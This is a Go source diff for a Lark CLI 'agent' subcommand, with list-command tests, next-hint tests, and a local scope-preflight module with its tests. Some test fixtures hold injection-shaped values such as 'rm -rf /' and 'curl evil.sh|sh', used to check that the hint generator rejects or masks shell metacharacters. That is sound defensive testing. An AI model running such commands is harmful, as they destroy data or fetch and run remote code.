cfg := &core.CliConfig{AppID: "cli_x", AppSecret: "fake-secret", Brand: core.BrandFeishu}
f, _, _, _ := cmdutil.TestFactory(t, cfg)
cmd := &cobra.Command{Use: "list"}
cmd.SetContext(context.Background())
opts := &listOptions{Factory: f, Cmd: cmd, Format: "json", Scheme: "fakedisc"}
out := f.IOStreams.Out.(interface{ Bytes() []byte })
if err := agentListRun(opts); err != nil {
t.Fatalf("list fakedisc should not error: %v", err)
}
var env output.Envelope
if err := json.Unmarshal(out.Bytes(), &env); err != nil {
t.Fatalf("output should be valid envelope JSON: %v (%s)", err, string(out.Bytes()))
}
data, _ := env.Data.(map[string]interface{})
agents, ok := data["agents"].([]interface{})
if !ok || len(agents) != 2 {
t.Fatalf("data.agents should have 2 entries, got %v", data["agents"])
}
first, _ := agents[0].(map[string]interface{})
if first["agent_ref"] != "fakedisc:a1" || first["name"] != "Agent One" {
t.Errorf("agents[0] should be an AgentSummary {agent_ref, name}, got %v", first)
}
if env.Meta == nil || env.Meta.Count != 2 {
t.Errorf("meta.count should be 2, got %+v", env.Meta)
}
}
// TestAgentListScheme_PropagatesIdentity pins the Task 10 review item: the
// provider rebuilt for the real ListAgents call must carry the resolved
// identity in its Deps (aligned with resolveProvider), not a zero As.
func TestAgentListScheme_PropagatesIdentity(t *testing.T) {
var captured iagent.Deps
iagent.Register("fakedeps", iagent.ProviderInfo{
Factory: func(deps iagent.Deps, agentID string) (*iagent.Provider, error) {
captured = deps
return newFakeDisc(), nil
},
Label: "test fake (deps capture)",
AgentRefFormat: "fakedeps:<agent_id>",
AgentIDSource: "test only",
Kind: iagent.KindCatalog,
Identities: []iagent.IdentitySpec{{Type: iagent.IdentityUser}},
})
cfg := &core.CliConfig{AppID: "cli_x", AppSecret: "fake-secret", Brand: core.BrandFeishu}
f, _, _, _ := cmdutil.TestFactory(t, cfg)
cmd := &cobra.Command{Use: "list"}
cmd.SetContext(context.Background())
opts := &listOptions{Factory: f, Cmd: cmd, Format: "json", Scheme: "fakedeps"}
if err := agentListRun(opts); err != nil {
t.Fatalf("list fakedeps should not error: %v", err)
}
if captured.As == "" {
t.Error("the rebuilt provider's Deps.As should carry the resolved identity, got empty")
}
if captured.As != f.ResolvedIdentity {
t.Errorf("Deps.As should match the Factory's resolved identity, got %q vs %q", captured.As, f.ResolvedIdentity)
}
}
// newDirtyName is an enumerable provider whose agent names carry ANSI escapes,
// to pin the pretty-path sanitization of agent-controlled fields.
func newDirtyName() *iagent.Provider {
return stubCore(&iagent.Provider{
ListAgents: func(ctx context.Context) ([]iagent.AgentSummary, error) {
return []iagent.AgentSummary{
{AgentRef: "fakedirty:a1", Name: "\x1b[31mEvil\x1b[0m One", Description: "d\x1b[2Jesc"},
}, nil
},
})
}
// TestAgentListScheme_PrettyStripsANSI pins the Task 10 review item: `agent list
// <scheme> --format pretty` must strip ANSI escapes from the agent-controlled
// Name/Description before they reach the terminal.
func TestAgentListScheme_PrettyStripsANSI(t *testing.T) {
iagent.Register("fakedirty", iagent.ProviderInfo{
Factory: func(deps iagent.Deps, agentID string) (*iagent.Provider, error) { return newDirtyName(), nil },
Label: "test fake (dirty names)",
AgentRefFormat: "fakedirty:<agent_id>",
AgentIDSource: "test only",
Kind: iagent.KindCatalog,
Identities: []iagent.IdentitySpec{{Type: iagent.IdentityUser}},
})
cfg := &core.CliConfig{AppID: "cli_x", AppSecret: "fake-secret", Brand: core.BrandFeishu}
f, _, _, _ := cmdutil.TestFactory(t, cfg)
cmd := &cobra.Command{Use: "list"}
cmd.SetContext(context.Background())
opts := &listOptions{Factory: f, Cmd: cmd, Format: "pretty", Scheme: "fakedirty"}
out := f.IOStreams.Out.(interface{ Bytes() []byte })
if err := agentListRun(opts); err != nil {
t.Fatalf("list fakedirty pretty should not error: %v", err)
}
text := string(out.Bytes())
if strings.Contains(text, "\x1b") {
t.Errorf("ANSI sequences in agent Name/Description must be stripped: %q", text)
}
if !strings.Contains(text, "Evil One") || !strings.Contains(text, "desc") {
t.Errorf("readable text should remain after stripping, got %q", text)
}
}
// TestAgentListJqFlagRegisteredAndConsumed pins the quality-review fix: the
// --jq flag must be registered on `agent list` and filter the envelope.
func TestAgentListJqFlagRegisteredAndConsumed(t *testing.T) {
out := &bytes.Buffer{}
errOut := &bytes.Buffer{}
f := &cmdutil.Factory{IOStreams: &cmdutil.IOStreams{Out: out, ErrOut: errOut}}
cmd := NewCmdAgentList(f)
cmd.SetOut(&bytes.Buffer{})
cmd.SetErr(&bytes.Buffer{})
cmd.SetContext(context.Background())
cmd.SetArgs([]string{"--jq", ".ok"})
if err := cmd.Execute(); err != nil {
t.Fatalf("agent list --jq should not error: %v", err)
}
if got := strings.TrimSpace(out.String()); got != "true" {
t.Errorf("--jq .ok should output only true, got %q", got)
}
}
// TestNewCmdAgentList_ReadRisk pins the read risk annotation, the json default
// of --format, the --jq flag presence, and that list takes at most one
// positional arg (the scheme).
func TestNewCmdAgentList_ReadRisk(t *testing.T) {
cmd := NewCmdAgentList(nil)
if level, ok := cmdutil.GetRisk(cmd); !ok || level != cmdutil.RiskRead {
t.Errorf("agent list should be marked read risk, got level=%q ok=%v", level, ok)
}
fl := cmd.Flags().Lookup("format")
if fl == nil {
t.Fatal("agent list should have a --format flag")
}
if fl.DefValue != "json" {
t.Errorf("--format default should flip to json, got %q", fl.DefValue)
}
if cmd.Flags().Lookup("jq") == nil {
t.Error("agent list should have a --jq flag")
}
if err := cmd.Args(cmd, []string{}); err != nil {
t.Errorf("agent list with no args should be valid: %v", err)
}
if err := cmd.Args(cmd, []string{"example"}); err != nil {
t.Errorf("agent list <scheme> should be valid: %v", err)
}
if err := cmd.Args(cmd, []string{"example", "extra"}); err == nil {
t.Error("agent list with more than 1 positional argument should error (MaximumNArgs 1)")
}
}

View File

@@ -0,0 +1,218 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"strings"
"testing"
iagent "github.com/larksuite/cli/internal/agent"
)
// allTaskStates is the full 9-state A2A enum (internal/agent/state.go), so the
// contract test automatically covers any future nextForTask branch keyed on a
// state instead of relying on hand-picked samples.
var allTaskStates = []iagent.TaskState{
iagent.StateSubmitted,
iagent.StateWorking,
iagent.StateInputRequired,
iagent.StateAuthRequired,
iagent.StateCompleted,
iagent.StateFailed,
iagent.StateCanceled,
iagent.StateRejected,
iagent.StateUnknown,
}
// TestNextForTaskCommandsParseAgainstRealTree is the meta.next contract test:
// every next command emitted by nextForTask — across all 9 task states, with
// and without a context id, template hints included (their <...> placeholders
// are single space-free tokens, so they parse as ordinary flag values) — must
// traverse and flag-parse against the real agent command tree. meta.next is
// defined as "AI executes this verbatim", so a next that references a
// nonexistent flag (e.g. --wait on task get) is a broken contract, caught here
// at build time instead of by a failing acceptance run.
func TestNextForTaskCommandsParseAgainstRealTree(t *testing.T) {
// GIVEN: the real agent subtree (nil Factory: construction-time only, no
// credentials; all meta.next commands live under `lark-cli agent ...`).
agentTree := NewCmdAgent(nil)
for _, state := range allTaskStates {
for _, ctxID := range []string{"", "conversation_1"} {
task := &iagent.AgentTask{
TaskID: "chat_1",
ContextID: ctxID,
State: state,
IsTerminal: state.IsTerminal(),
}
next := nextForTask("example:agent_x", task)
if len(next) == 0 {
t.Fatalf("state %s (ctx %q): legit task must produce next hints", state, ctxID)
}
for _, n := range next {
if state == iagent.StateAuthRequired {
// auth_required is an agent-side task state whose next step is
// the auth (re-authorize) flow, so it legitimately points OUT
// of the agent subtree and is not traversable against
// agentTree; assert its shape and skip the agent traversal.
if !strings.HasPrefix(n.Command, "lark-cli auth login") || !strings.Contains(n.Command, "--scope") {
t.Fatalf("auth_required next should point to auth login --scope, got %q", n.Command)
}
continue
}
if !strings.HasPrefix(n.Command, "lark-cli agent ") {
t.Fatalf("next %q must target the agent subtree", n.Command)
}
// WHEN: the command string is parsed against the real tree.
argv := strings.Fields(strings.TrimPrefix(n.Command, "lark-cli agent "))
c, flags, err := agentTree.Traverse(argv)
// THEN: it traverses to a leaf and its flags all exist.
if err != nil {
t.Fatalf("state %s (ctx %q): next %q not traversable: %v", state, ctxID, n.Command, err)
}
if c == agentTree {
t.Fatalf("state %s (ctx %q): next %q did not reach a subcommand", state, ctxID, n.Command)
}
if err := c.ParseFlags(flags); err != nil {
t.Fatalf("state %s (ctx %q): next %q flags invalid: %v", state, ctxID, n.Command, err)
}
}
}
}
}
// TestNextForTaskRejectsInjectionIDs pins the security whitelist: a
// server-supplied task_id that is not pure [A-Za-z0-9_-] must suppress the
// whole next entry (omit rather than risk injection), in every state —
// meta.next commands are executed verbatim by AI callers, so shell
// metacharacters in an interpolated id are command injection.
func TestNextForTaskRejectsInjectionIDs(t *testing.T) {
for _, bad := range []string{"chat_1; rm -rf /", "chat `x`", "chat 1", `chat"1"`, "chat$(x)", "chat|x"} {
for _, state := range allTaskStates {
task := &iagent.AgentTask{TaskID: bad, State: state}
if next := nextForTask("example:agent_x", task); len(next) != 0 {
t.Fatalf("injection task_id %q (state %s) must suppress next, got %+v", bad, state, next)
}
}
}
}
// TestNextForTaskRejectsUnsafeRef pins the ref whitelist:
// the user-echoed ref is interpolated into every next command, so a ref that
// is not <charset>:<charset> (exactly one ':', [A-Za-z0-9_-] on both sides)
// suppresses the whole hint — a ref with spaces/quotes would make the command
// un-copy-pasteable at best and an injection surface at worst.
func TestNextForTaskRejectsUnsafeRef(t *testing.T) {
task := &iagent.AgentTask{TaskID: "chat_1", State: iagent.StateWorking}
for _, bad := range []string{"example:agent x", "example:x;rm -rf /", "example", "a:b:c", "example:$(x)", `example:"x"`, ":x", "example:"} {
if next := nextForTask(bad, task); len(next) != 0 {
t.Errorf("unsafe ref %q should suppress the whole next, got %+v", bad, next)
}
}
if next := nextForTask("example:agent_x", task); len(next) == 0 {
t.Error("valid ref example:agent_x should keep next")
}
}
// TestNextForTaskDegradesInjectionContextID pins the context_id whitelist with
// its degradation semantics: a legit task_id with an injection-shaped
// context_id (input_required branch interpolates both) keeps the hint but
// replaces the dirty id with the <context_id> placeholder — Template:true, no
// untrusted content interpolated.
func TestNextForTaskDegradesInjectionContextID(t *testing.T) {
dirty := "conv_1; curl evil.sh|sh"
task := &iagent.AgentTask{
TaskID: "chat_1",
ContextID: dirty,
State: iagent.StateInputRequired,
}
next := nextForTask("example:agent_x", task)
if len(next) != 1 {
t.Fatalf("dirty context_id must degrade, not drop the hint, got %+v", next)
}
if !next[0].Template {
t.Errorf("degraded hint must be template=true, got %+v", next[0])
}
if !strings.Contains(next[0].Command, "<context_id>") {
t.Errorf("degraded hint must use the <context_id> placeholder: %q", next[0].Command)
}
if strings.Contains(next[0].Command, "conv_1") {
t.Errorf("dirty context_id leaked into the command: %q", next[0].Command)
}
}
// TestNextForTaskAuthRequiredPointsToAuth pins F6: auth_required is an
// agent-side task state (the end user must (re)authorize in the agent), NOT a
// text-continuation like input_required. Its next must point at the auth
// re-authorize flow (auth login --scope), never reuse the text-continuation
// send hint.
func TestNextForTaskAuthRequiredPointsToAuth(t *testing.T) {
task := &iagent.AgentTask{TaskID: "chat_1", ContextID: "conv_1", State: iagent.StateAuthRequired}
next := nextForTask("example:agent_x", task)
if len(next) != 1 {
t.Fatalf("auth_required should produce 1 next, got %+v", next)
}
// Must NOT be the input_required text-continuation hint.
if strings.Contains(next[0].Command, "agent send") || strings.Contains(next[0].Command, "--text") {
t.Fatalf("auth_required should not reuse the text-continuation hint, got %q", next[0].Command)
}
// Must point at the auth (re-authorize) flow.
if !strings.HasPrefix(next[0].Command, "lark-cli auth login") || !strings.Contains(next[0].Command, "--scope") {
t.Fatalf("auth_required should point to auth login --scope, got %q", next[0].Command)
}
// The concrete scopes come from the card, so the command carries a
// placeholder and must be marked template.
if !next[0].Template {
t.Errorf("contains a placeholder, should be Template=true, got %+v", next[0])
}
}
// TestNextForTaskWatchNotWait pins the flag-name fix and the bounded-watch
// default: task get has --watch, not --wait, and the poll hint must suggest a
// BOUNDED watch (`--watch --timeout <default>`) so an AI caller neither blocks
// forever on a long task nor self-hammers with unbounded polls.
func TestNextForTaskWatchNotWait(t *testing.T) {
next := nextForTask("example:agent_x", &iagent.AgentTask{TaskID: "chat_1", State: iagent.StateWorking})
if len(next) == 0 {
t.Fatal("working task must produce a poll next")
}
if !strings.Contains(next[0].Command, "--watch") || strings.Contains(next[0].Command, "--wait") {
t.Fatalf("poll next must use --watch: %+v", next)
}
wantTimeout := "--timeout " + defaultWatchTimeout.String()
if !strings.Contains(next[0].Command, wantTimeout) {
t.Fatalf("poll next must be bounded with %q, got %+v", wantTimeout, next)
}
}
// TestNextForTaskTemplateFlag pins the template marker semantics: the
// input_required continue hint carries a <你的答复> placeholder, so it must be
// marked template=true (not directly executable); poll and terminal-detail
// hints are verbatim-executable and must not carry the marker.
func TestNextForTaskTemplateFlag(t *testing.T) {
// input_required with a known context: placeholder in --text → template.
cont := nextForTask("example:agent_x", &iagent.AgentTask{
TaskID: "chat_1", ContextID: "conv_1", State: iagent.StateInputRequired,
})
if len(cont) != 1 || !cont[0].Template {
t.Fatalf("input_required next must be template=true, got %+v", cont)
}
// input_required without a context id: <context_id> placeholder → template.
contNoCtx := nextForTask("example:agent_x", &iagent.AgentTask{
TaskID: "chat_1", State: iagent.StateInputRequired,
})
if len(contNoCtx) != 1 || !contNoCtx[0].Template {
t.Fatalf("input_required (no ctx) next must be template=true, got %+v", contNoCtx)
}
// Poll and terminal-detail hints are directly executable → no template flag.
for _, task := range []*iagent.AgentTask{
{TaskID: "chat_1", State: iagent.StateWorking},
{TaskID: "chat_1", State: iagent.StateCompleted, IsTerminal: true},
} {
next := nextForTask("example:agent_x", task)
if len(next) != 1 || next[0].Template {
t.Fatalf("state %s next must be executable (template unset), got %+v", task.State, next)
}
}
}

133
cmd/agent/preflight.go Normal file
View File

@@ -0,0 +1,133 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"sort"
"strings"
"github.com/larksuite/cli/errs"
iagent "github.com/larksuite/cli/internal/agent"
larkauth "github.com/larksuite/cli/internal/auth"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/core"
)
// This file implements the local scope preflight: after
// resolveProvider succeeds and before the real API call, the stored user
// token's scope list is checked against the provider's RequiredScopes
// declaration. The check is all-or-nothing — any real API verb requires the
// provider's entire scope set. It is entirely local — the scope list is read
// from the credential cache (keychain), never from the network — so a missing
// scope surfaces as an actionable validation error (exit 2) instead of a
// round-trip API 99991679. `--dry-run` never reaches it (dry-run returns before
// resolveProvider), preserving its always-available contract.
// storedUserScopes is the token-scope read seam: it returns the granted scope
// list of the stored user token from the LOCAL credential cache (keychain via
// GetStoredToken — same read path as `auth check`), issuing no network
// request. nil/empty means "no usable local scope list" and the caller skips
// preflight. Tests swap it so no unit test touches the real keychain.
var storedUserScopes = func(f *cmdutil.Factory) []string {
if f == nil || f.Config == nil {
return nil
}
config, err := f.Config()
if err != nil || config == nil || config.UserOpenId == "" {
return nil
}
stored := larkauth.GetStoredToken(config.AppID, config.UserOpenId)
if stored == nil {
return nil
}
return strings.Fields(stored.Scope)
}
// preflightInput is the pure input of preflightScopes, so the check itself is
// unit-testable without a Factory, keychain, or provider client.
type preflightInput struct {
Identity core.Identity
TokenScopes []string
Info iagent.ProviderInfo
}
// preflightScopes runs the local scope check. It returns nil when the check
// does not apply — bot identity (a tenant token has no scope-list concept; the
// API error + errclass hint own that path) or an unreadable/empty local scope
// list (the downstream not_configured / need-authorization logic owns that).
// The check is all-or-nothing: when any scope in the provider's RequiredScopes
// set is not granted it returns the missing_scope permission error
// (exit 3, mirroring the event-consume scope preflight) carrying every missing
// scope, with a re-auth hint whose --scope
// merges the stored grants with the provider's FULL RequiredScopes set — auth
// login --scope REPLACES the grant, so the hint must be copy-paste-safe
// without dropping existing permissions.
func preflightScopes(in preflightInput) error {
if in.Identity != core.AsUser || len(in.TokenScopes) == 0 {
return nil
}
granted := make(map[string]bool, len(in.TokenScopes))
for _, s := range in.TokenScopes {
granted[s] = true
}
var missing []string
for _, scope := range in.Info.RequiredScopes {
if !granted[scope] {
missing = append(missing, scope)
}
}
if len(missing) == 0 {
return nil
}
sort.Strings(missing)
// Merged re-auth scope set: existing grants the provider's FULL
// RequiredScopes, sorted for stability.
mergedSet := make(map[string]bool, len(in.TokenScopes)+len(in.Info.RequiredScopes))
for _, s := range in.TokenScopes {
mergedSet[s] = true
}
for _, s := range in.Info.RequiredScopes {
mergedSet[s] = true
}
merged := make([]string, 0, len(mergedSet))
for s := range mergedSet {
merged = append(merged, s)
}
sort.Strings(merged)
return errs.NewPermissionError(errs.SubtypeMissingScope,
"当前 user 身份缺少本命令所需 scope: %s", strings.Join(missing, ", ")).
WithIdentity(string(core.AsUser)).
WithMissingScopes(missing...).
WithHint("一次性补齐该 agent 全部所需 scope已合并现有授权照抄不丢权限: lark-cli auth login --scope \"%s\"",
strings.Join(merged, " "))
}
// preflightScopesForRef is the command-layer wiring: it resolves the provider
// registration for ref's scheme, reads the stored user scopes through the
// seam, and runs the all-or-nothing preflight. Any gap in its own inputs (nil
// Factory, unparsable ref, unregistered scheme) yields nil — the preflight is
// an accelerator, never a new failure mode; the paths that validate ref/scheme
// for real have already run inside resolveProvider.
func preflightScopesForRef(f *cmdutil.Factory, id core.Identity, ref string) error {
if f == nil || id != core.AsUser {
return nil
}
r, err := iagent.ParseRef(ref)
if err != nil {
return nil //nolint:nilerr // preflight is best-effort: resolveProvider already surfaced any real ref error
}
info, ok := iagent.Info(r.Scheme)
if !ok {
return nil
}
return preflightScopes(preflightInput{
Identity: id,
TokenScopes: storedUserScopes(f),
Info: info,
})
}

365
cmd/agent/preflight_test.go Normal file
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@@ -0,0 +1,365 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"context"
"errors"
"reflect"
"strings"
"testing"
"github.com/spf13/cobra"
"github.com/larksuite/cli/errs"
iagent "github.com/larksuite/cli/internal/agent"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/core"
"github.com/larksuite/cli/internal/httpmock"
"github.com/larksuite/cli/internal/output"
)
// scopedInfo fetches the registered fakescoped ProviderInfo (4 RequiredScopes,
// see scripted_provider_test.go) — the all-or-nothing preflight requires every
// one of fakescopedAllScopes for any real API verb.
func scopedInfo(t *testing.T) iagent.ProviderInfo {
t.Helper()
registerScripted()
info, ok := iagent.Info("fakescoped")
if !ok {
t.Fatal("fakescoped provider should be registered")
}
return info
}
// requirePreflightError asserts err is the missing_scope permission error
// (exit 3, mirroring the event-consume scope preflight) and returns the typed
// value for field assertions.
func requirePreflightError(t *testing.T, err error) *errs.PermissionError {
t.Helper()
if err == nil {
t.Fatal("want missing_scope error, got nil")
}
var pe *errs.PermissionError
if !errors.As(err, &pe) {
t.Fatalf("want *errs.PermissionError, got %T: %v", err, err)
}
if pe.Subtype != errs.SubtypeMissingScope {
t.Fatalf("subtype should be missing_scope, got %q", pe.Subtype)
}
if code := output.ExitCodeOf(err); code != 3 {
t.Fatalf("exit code should be 3, got %d", code)
}
return pe
}
// TestPreflightReportsAllMissingWithMergedHint is the all-or-nothing pin: the
// check is all-or-nothing, so a user token holding only some of the provider's scopes fails
// with EVERY missing scope named (sorted) in both the message and
// missing_scopes, and a re-auth hint that merges the stored token scopes with
// the provider's FULL RequiredScopes set (sorted, so re-running the login
// command never drops an existing grant).
func TestPreflightReportsAllMissingWithMergedHint(t *testing.T) {
err := preflightScopes(preflightInput{
Identity: core.AsUser,
TokenScopes: []string{"im:message", "fakescoped:agent_chat:write"},
Info: scopedInfo(t),
})
ve := requirePreflightError(t, err)
wantMissing := []string{"fakescoped:agent_artifact:read", "fakescoped:agent_attachment:write", "fakescoped:agent_chat:read"}
if !strings.Contains(ve.Message, "当前 user 身份缺少本命令所需 scope: "+strings.Join(wantMissing, ", ")) {
t.Errorf("message should list all missing scopes, got %q", ve.Message)
}
if !reflect.DeepEqual(ve.MissingScopes, wantMissing) {
t.Errorf("missing_scopes should be %v (all missing, stable sort), got %v", wantMissing, ve.MissingScopes)
}
// Merged hint: existing token scopes FULL provider RequiredScopes, sorted.
wantScopeArg := `lark-cli auth login --scope "fakescoped:agent_artifact:read fakescoped:agent_attachment:write fakescoped:agent_chat:read fakescoped:agent_chat:write im:message"`
if !strings.Contains(ve.Hint, wantScopeArg) {
t.Errorf("hint should contain the merged full-scope command %q, got %q", wantScopeArg, ve.Hint)
}
}
// TestPreflightBotSkipped pins that a bot token has no scope list concept, so
// preflight is skipped entirely regardless of TokenScopes.
func TestPreflightBotSkipped(t *testing.T) {
err := preflightScopes(preflightInput{
Identity: core.AsBot,
TokenScopes: nil,
Info: scopedInfo(t),
})
if err != nil {
t.Fatalf("bot identity should skip preflight, got %v", err)
}
}
// TestPreflightNoTokenScopesReturnsNil pins that no local token (or a token
// without a scope list) yields nil so the downstream not_configured /
// need-authorization path owns the error.
func TestPreflightNoTokenScopesReturnsNil(t *testing.T) {
err := preflightScopes(preflightInput{
Identity: core.AsUser,
TokenScopes: nil,
Info: scopedInfo(t),
})
if err != nil {
t.Fatalf("no token scope list should return nil, got %v", err)
}
}
// TestPreflightAllScopesPresent pins the happy path: a token carrying all four
// fakescoped scopes passes the all-or-nothing check.
func TestPreflightAllScopesPresent(t *testing.T) {
if err := preflightScopes(preflightInput{
Identity: core.AsUser, TokenScopes: fakescopedAllScopes, Info: scopedInfo(t),
}); err != nil {
t.Errorf("should pass when all scopes present, got %v", err)
}
}
// TestPreflightMissingAnyScopeFails pins the all-or-nothing rule: a token that
// is missing even a single scope fails, and the reported missing set is exactly
// the scopes it lacks (not just this-verb scopes — the per-verb concept is
// gone).
func TestPreflightMissingAnyScopeFails(t *testing.T) {
// Missing exactly one scope (attachment) → that one scope is reported.
ve := requirePreflightError(t, preflightScopes(preflightInput{
Identity: core.AsUser,
TokenScopes: []string{
"fakescoped:agent_chat:write", "fakescoped:agent_chat:read", "fakescoped:agent_artifact:read",
},
Info: scopedInfo(t),
}))
if !reflect.DeepEqual(ve.MissingScopes, []string{"fakescoped:agent_attachment:write"}) {
t.Errorf("when only attachment is missing, missing_scopes should be [fakescoped:agent_attachment:write], got %v", ve.MissingScopes)
}
// Only the write scope → the other three are all reported.
ve = requirePreflightError(t, preflightScopes(preflightInput{
Identity: core.AsUser, TokenScopes: []string{"fakescoped:agent_chat:write"}, Info: scopedInfo(t),
}))
wantMissing := []string{"fakescoped:agent_artifact:read", "fakescoped:agent_attachment:write", "fakescoped:agent_chat:read"}
if !reflect.DeepEqual(ve.MissingScopes, wantMissing) {
t.Errorf("with only the write scope, missing_scopes should be %v, got %v", wantMissing, ve.MissingScopes)
}
}
// ---------------------------------------------------------------------------
// Command wiring: each verb runs preflight after resolveProvider and before
// any real API call. The stored-scope read goes through the storedUserScopes
// seam so no test touches the real keychain; zero httpmock stubs are
// registered, so any HTTP request would fail the test with a transport error
// instead of the asserted missing_scope.
// ---------------------------------------------------------------------------
// swapStoredScopes swaps the storedUserScopes seam for the test's scope list.
func swapStoredScopes(t *testing.T, scopes []string) {
t.Helper()
old := storedUserScopes
storedUserScopes = func(*cmdutil.Factory) []string { return scopes }
t.Cleanup(func() { storedUserScopes = old })
}
// userLeafCmd builds a leaf command under lark-cli/agent/... with --as
// explicitly set to user so ResolveAs honors it verbatim.
func userLeafCmd(t *testing.T, names ...string) *cobra.Command {
t.Helper()
parent := &cobra.Command{Use: "lark-cli"}
for _, name := range names {
child := &cobra.Command{Use: name}
parent.AddCommand(child)
parent = child
}
parent.Flags().String("as", "", "identity")
if err := parent.Flags().Set("as", "user"); err != nil {
t.Fatal(err)
}
parent.SetContext(context.Background())
return parent
}
// userFactory builds a test Factory + registry for a user-identity run.
func userFactory(t *testing.T) (*cmdutil.Factory, *httpmock.Registry) {
t.Helper()
f, _, _, reg := cmdutil.TestFactory(t, &core.CliConfig{AppID: "cli_x", AppSecret: "fake-secret", Brand: core.BrandFeishu})
return f, reg
}
// TestSendPreflightBlocksMissingScope pins the send wiring: a user token that
// holds none of the provider's scopes fails with missing_scope
// (reporting the full set) and no request.
func TestSendPreflightBlocksMissingScope(t *testing.T) {
swapStoredScopes(t, []string{"im:message"})
f, _ := userFactory(t)
err := agentSendRun(&sendOptions{
Factory: f, Cmd: userLeafCmd(t, "agent", "send"),
Ref: "fakescoped:agt_x", Text: "hi", As: "user",
})
ve := requirePreflightError(t, err)
if !reflect.DeepEqual(ve.MissingScopes, fakescopedAllScopes) {
t.Errorf("with no provider scope, send should report all missing %v, got %v", fakescopedAllScopes, ve.MissingScopes)
}
}
// TestSendPreflightPartialTokenBlocked pins that a partial token (write only)
// still fails the all-or-nothing check, reporting the three scopes it lacks.
func TestSendPreflightPartialTokenBlocked(t *testing.T) {
swapStoredScopes(t, []string{"fakescoped:agent_chat:write"})
f, _ := userFactory(t)
err := agentSendRun(&sendOptions{
Factory: f, Cmd: userLeafCmd(t, "agent", "send"),
Ref: "fakescoped:agt_x", Text: "hi", As: "user",
})
ve := requirePreflightError(t, err)
wantMissing := []string{"fakescoped:agent_artifact:read", "fakescoped:agent_attachment:write", "fakescoped:agent_chat:read"}
if !reflect.DeepEqual(ve.MissingScopes, wantMissing) {
t.Errorf("write-only token should report missing %v, got %v", wantMissing, ve.MissingScopes)
}
}
// TestSendDryRunSkipsPreflight pins that --dry-run stays API-free AND
// scope-free — it succeeds even when the token has none of the provider scopes.
func TestSendDryRunSkipsPreflight(t *testing.T) {
swapStoredScopes(t, []string{"im:message"})
f, _ := userFactory(t)
err := agentSendRun(&sendOptions{
Factory: f, Cmd: userLeafCmd(t, "agent", "send"),
Ref: "fakescoped:agt_x", Text: "hi", As: "user", DryRun: true,
})
if err != nil {
t.Fatalf("--dry-run should not run scope preflight: %v", err)
}
}
// TestTaskGetPreflightBlocksMissingScope pins the task get wiring.
func TestTaskGetPreflightBlocksMissingScope(t *testing.T) {
swapStoredScopes(t, []string{"fakescoped:agent_chat:write"})
f, _ := userFactory(t)
err := agentTaskGetRun(&taskOptions{
Factory: f, Cmd: userLeafCmd(t, "agent", "task", "get"),
Ref: "fakescoped:agt_x", TaskID: "t1", As: "user",
})
ve := requirePreflightError(t, err)
if !contains(ve.MissingScopes, "fakescoped:agent_chat:read") {
t.Errorf("task get missing scope should include fakescoped:agent_chat:read, got %v", ve.MissingScopes)
}
}
// TestTaskGetArtifactPreflightFires pins the --artifact download wiring
// (resolveDownload path): it too runs the all-or-nothing preflight before the
// API call.
func TestTaskGetArtifactPreflightFires(t *testing.T) {
swapStoredScopes(t, []string{"fakescoped:agent_chat:read"})
f, _ := userFactory(t)
err := agentTaskGetRun(&taskOptions{
Factory: f, Cmd: userLeafCmd(t, "agent", "task", "get"),
Ref: "fakescoped:agt_x", TaskID: "t1", As: "user",
ArtifactID: "art_1", Output: "out.bin",
})
ve := requirePreflightError(t, err)
if !contains(ve.MissingScopes, "fakescoped:agent_artifact:read") {
t.Errorf("task get --artifact missing scope should include fakescoped:agent_artifact:read, got %v", ve.MissingScopes)
}
}
// TestTaskListPreflightBlocksMissingScope pins the task list wiring.
func TestTaskListPreflightBlocksMissingScope(t *testing.T) {
swapStoredScopes(t, []string{"fakescoped:agent_chat:write"})
f, _ := userFactory(t)
err := agentTaskListRun(&taskOptions{
Factory: f, Cmd: userLeafCmd(t, "agent", "task", "list"),
Ref: "fakescoped:agt_x", As: "user",
})
requirePreflightError(t, err)
}
// TestContextVerbsPreflightBlocksMissingScope pins the context list/get/delete
// wiring: all three run the all-or-nothing preflight.
func TestContextVerbsPreflightBlocksMissingScope(t *testing.T) {
runs := []struct {
name string
run func(f *cmdutil.Factory) error
}{
{"list", func(f *cmdutil.Factory) error {
return agentContextListRun(&contextOptions{
Factory: f, Cmd: userLeafCmd(t, "agent", "context", "list"),
Ref: "fakescoped:agt_x", As: "user", Format: "pretty",
})
}},
{"get", func(f *cmdutil.Factory) error {
return agentContextGetRun(&contextOptions{
Factory: f, Cmd: userLeafCmd(t, "agent", "context", "get"),
Ref: "fakescoped:agt_x", CtxID: "ctx_1", As: "user",
})
}},
{"delete", func(f *cmdutil.Factory) error {
return agentContextDeleteRun(&contextOptions{
Factory: f, Cmd: userLeafCmd(t, "agent", "context", "delete"),
Ref: "fakescoped:agt_x", CtxID: "ctx_1", As: "user", Yes: true,
})
}},
}
for _, tc := range runs {
t.Run(tc.name, func(t *testing.T) {
swapStoredScopes(t, []string{"fakescoped:agent_chat:write"})
f, _ := userFactory(t)
requirePreflightError(t, tc.run(f))
})
}
}
// TestSendPreflightPassesWithScopeAndSends pins that a token holding the full
// provider scope set lets the real send proceed (the scripted Send hook fires,
// proving preflight did not false-positive).
func TestSendPreflightPassesWithScopeAndSends(t *testing.T) {
swapStoredScopes(t, fakescopedAllScopes)
f, _ := userFactory(t)
sent := false
setScripted(t, scriptedHooks{send: func(iagent.SendInput) (*iagent.AgentTask, error) {
sent = true
return &iagent.AgentTask{TaskID: "chat_1", ContextID: "sess_1", State: iagent.StateWorking}, nil
}})
err := agentSendRun(&sendOptions{
Factory: f, Cmd: userLeafCmd(t, "agent", "send"),
Ref: "fakescoped:agt_x", Text: "hi", As: "user",
})
if err != nil {
t.Fatalf("a send with all scopes should pass preflight and send: %v", err)
}
if !sent {
t.Fatal("provider.Send should actually be called after preflight passes")
}
}
// TestTaskCancelPreflightWired pins the task cancel wiring: the capability
// gate (fakescoped card declares task_cancel=false) answers before
// provider/preflight, so a scope-missing user token yields
// unsupported_capability, not missing_scope — proving the wired
// preflight does not change the gate-first ordering.
func TestTaskCancelPreflightWired(t *testing.T) {
swapStoredScopes(t, []string{"im:message"})
